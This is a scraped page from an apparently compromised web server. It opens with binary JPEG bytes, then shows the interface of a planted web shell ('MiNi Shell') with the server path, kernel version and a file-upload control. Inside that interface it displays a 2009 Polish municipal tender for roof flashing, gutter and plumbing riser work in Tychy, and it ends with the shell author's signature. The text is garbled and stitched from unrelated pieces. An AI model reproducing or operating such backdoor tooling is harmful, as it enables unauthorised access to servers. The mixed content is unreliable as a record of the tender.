JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090708/107085-N-2009.html

<p class="kh_header"><b>Tychy: Wymiana obróbek blacharskich dachu, rynien oraz pionów instalacji kanalizacyjnej 
       i wodociągowej w budynku mieszkalnym - wielorodzinnym w Tychach,
       przy ul. Wojska Polskiego 7-7d</b><br>
<b>Numer ogłoszenia: 107085 - 2009; data zamieszczenia: 08.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana obróbek blacharskich dachu, rynien oraz pionów instalacji kanalizacyjnej 
       i wodociągowej w budynku mieszkalnym - wielorodzinnym w Tychach,
       przy ul. Wojska Polskiego 7-7d.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia jest wykonanie robót budowlanych w zakresie wymiany obróbek blacharskich dachu, rynien oraz pionów instalacji kanalizacyjnej i wodociągowej 
w budynku mieszkalnym - wielorodzinnym z podziałem na 2 części zwane dalej 
zadaniami, tj. :   

        Zadanie Nr 1 -	Wymiana obróbek blacharskich dachu z wymianą rynien ocynkowanych 
                               	w budynku mieszkalnym - wielorodzinnym Wspólnoty Mieszkaniowej Nr 26/I
   	w Tychach, przy ul. Wojska Polskiego 7-7 d

        Zadanie Nr 2 -	Wymiana pionów kanalizacyjnych żeliwnych oraz pionów instalacji 
  	wodociągowej w budynku mieszkalnym - wielorodzinnym 
	Wspólnoty Mieszkaniowej Nr 26/I w Tychach, przy ul. Wojska Polskiego 7-7 d


     2. Zakres robót obejmuje m.in.:
    
dla Zadania Nr 1:
- wykonanie daszków ochronnych;
- rozbiórka elementów betonowych (czapki kominowe);
- przemurowanie kominów;
- tynki zewnętrzne kominów;
- rozebranie rynien ocynkowanych;
- wymiana pasów z blachy ocynkowanej pasy nadrynnowe;
- ułożenie nowych rynien z blachy ocynkowanej;
- roboty ziemne;
- wywóz i utylizacja gruzu;

dla Zadania Nr 2:
Wymiana pionów instalacji kanalizacyjnej i wodociągowej w 6 mieszkaniach: 
- roboty demontażowe;
- wymiana 4 pionów kanalizacyjnych żeliwnych - w kuchni i w łazience; 
- wymiana 4 pionów instalacji wodociągowej wewnętrznej z rur ocynkowanych - w kuchni                  i w łazience;
- demontaż i ponowny montaż urządzeń sanitarnych;
- roboty tynkarskie;
- wywóz i utylizacja gruzu;
  Szczegółowy zakres robót określają przedmiary robót na każde z Zadań..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.13.20-3, 45.26.19.10-6, 45.11.13.00-1, 45.33.20.00-3, 45.41.00.00-4, 45.26.25.00-6, 45.11.12.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium o wartości: 
 
     dla Zadania Nr 1: 1 800,00 zł
     (słownie: tysiąc osiemset złotych - na czas związania ofertą).  

     dla Zadania Nr 2: nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I.    Warunki udziału w postępowaniu i sposób dokonywania ich oceny:    
  1. O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki określone na 
      podstawie art. 22 ust.1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych
      (tekst jednolity Dz.U. z 20 listopada 2007 r., Nr 223, poz. 1655, z późn. zm.), tj.:  
  1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
nakładają obowiązek posiadania takich uprawnień ; 

  2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  
      i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
      innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
      zamówienia; 
  3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;

  4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
       art. 24 ust. 1 i 2 ustawy
        oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia. 
2.  Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie 
     złożonego oświadczenia oraz dołączonych do oferty dokumentów wymienionych 
     w punkcie II niniejszego rozdziału według zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Wykonawca wraz z ofertą składa następujące oświadczenia i dokumenty: 

  1)  oświadczenie potwierdzające spełnienie warunku udziału w postępowaniu 
        stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4  ustawy - Pzp. 

     - dotyczy Zadania nr 1 i 2 - wzór druku oświadczenia stanowi załącznik do specyfikacji,
       (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia                
        oświadczenie o spełnianiu warunków udziału w postępowaniu składają wszyscy Wykonawcy)

  2)  aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie 
       do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
       do rejestru lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony  
       nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;  

     - dotyczy Zadania nr 1 i 2 

3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 
     właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
       Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem 
       podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, 
       że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
       płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych 
       nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

     - dotyczy Zadania nr 1 i 2

                (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
       przedmiotowe dokumenty wymienione w punkcie 2) i 3) muszą być złożone dla każdego z nich).

4)  aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca
      jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
     - o wartości ubezpieczenia nie mniejszej niż:
  
     dla Zadania Nr 1: 70 000,00 zł;

     dla Zadania Nr 2: 10 000,00 zł ;
    Kwotę ubezpieczenia wyrażoną w  innej walucie niż PLN, Zamawiający przeliczy na PLN,
    przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez
    Narodowy Bank Polski.

    (W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli  
    Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z Wykonawców)  
 
5)  wykaz wykonanych robót budowlanych odpowiadających swoim rodzajem i wartością
     robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz
     daty i miejsca wykonania - należy wykazać co najmniej d w i e roboty w ramach odrębnych
     umów o charakterze podobnym do przedmiotu zamówienia tj.: 
     dla Zadania Nr 1 - roboty dekarsko - murarskie o wartości każdej z tych robót 
     nie mniejszej niż 38 000,00 zł (brutto) 
     dla Zadania Nr 2 - roboty instalacyjne branży kanalizacyjnej lub wodociągowej o wartości 
     każdej z tych robót nie mniejszej niż 8 000,00 zł (brutto)
     oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane  
     należycie.

     Wykaz wykonanych robót budowlanych o charakterze podobnym do przedmiotu zamówienia należy 
     sporządzić wg wzoru druku stanowiącego załącznik do SIWZ. 
  - W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie  
    lub co najmniej jeden z Wykonawców


6)  dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonywaniu 
     zamówienia, w szczególności uprawnionymi do sprawowania samodzielnych funkcji
     technicznych w budownictwie w specjalnościach niezbędnych do projektowania i wykonania
     robót budowlanych art. 12 i 13 ustawy z dnia 7 lipca 1994 r. - Prawo Budowlane 
    (Dz. U. z 2006r., Nr 156, poz.118 z późn. zmianami), którzy są członkami Polskiej Izby
     Inżynierów Budownictwa (art.6 ustawy z dnia 15 grudnia 2000r. samorządach zawodowych,
     architektów, inżynierów budowlanych i Urbanistów, Dz. U. z 2001 r. Nr 5, poz. 42 z późn.
     zm.), tj.: 
     dla Zadania Nr 1 - osobą / osobami posiadającymi uprawnienia budowlane w specjalności 
     konstrukcyjno - budowlanej
     dla Zadania Nr 2 - osobą / osobami posiadającymi uprawnienia budowlane w specjalności 
     instalacyjno - inżynieryjnej lub instalacyjnej w zakresie instalacji sanitarnych


     Do oferty należy załączyć:

   - kserokopię uprawnień budowlanych w specjalności:
     dla Zadania Nr 1 - konstrukcyjno - budowlanej 
     dla Zadania Nr 2 - instalacyjno - inżynieryjnej lub instalacyjnej w zakresie instalacji 
                                  sanitarnych
    oraz aktualne zaświadczenie wydane przez właściwą Izbę Inżynierów Budownictwa. 

   (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie 
    lub co najmniej jeden z Wykonawców)
     
    Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia.
               
2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     (Dz. U. Nr 87, poz. 605, z późn. zm. ) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1., p.pkt. 2) i 3) - składa 
     dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
     zamieszkania, potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
          na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
          organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub 
     miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie w pkt. 1.,
     p.pkt. 2) i 3) zastępuje się je dokumentem zawierającym oświadczenie złożone przed 
     notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu 
     zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
     Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - pokój Nr 20, cena 13 zł (brutto) lub za 
zaliczeniem pocztowym. Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej przekazanie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2009 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 -	Wymiana obróbek blacharskich dachu z wymianą rynien ocynkowanych 
                               	w budynku mieszkalnym - wielorodzinnym Wspólnoty Mieszkaniowej Nr 26/I
   	w Tychach, przy ul. Wojska Polskiego 7-7 d.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
- wykonanie daszków ochronnych;
- rozbiórka elementów betonowych (czapki kominowe);
- przemurowanie kominów;
- tynki zewnętrzne kominów;
- rozebranie rynien ocynkowanych;
- wymiana pasów z blachy ocynkowanej pasy nadrynnowe;
- ułożenie nowych rynien z blachy ocynkowanej;
- roboty ziemne;
- wywóz i utylizacja gruzu;
Szczegółowy zakres robót określa przedmiar robót..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.13.20-3, 45.26.19.10-6, 45.11.13.00-1, 45.41.00.00-4, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 -	Wymiana pionów kanalizacyjnych żeliwnych oraz pionów instalacji 
  	wodociągowej w budynku mieszkalnym - wielorodzinnym 
	Wspólnoty Mieszkaniowej Nr 26/I w Tychach, przy ul. Wojska Polskiego 7-7 d.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje m.in.:
Wymiana pionów instalacji kanalizacyjnej i wodociągowej w 6 mieszkaniach: 
- roboty demontażowe;
- wymiana 4 pionów kanalizacyjnych żeliwnych - w kuchni i w łazience; 
- wymiana 4 pionów instalacji wodociągowej wewnętrznej z rur ocynkowanych - w kuchni                  i w łazience;
- demontaż i ponowny montaż urządzeń sanitarnych;
- roboty tynkarskie;
- wywóz i utylizacja gruzu;
  Szczegółowy zakres robót określa przedmiar robót..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.33.20.00-3, 45.41.00.00-4, 45.26.25.00-6, 45.11.12.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com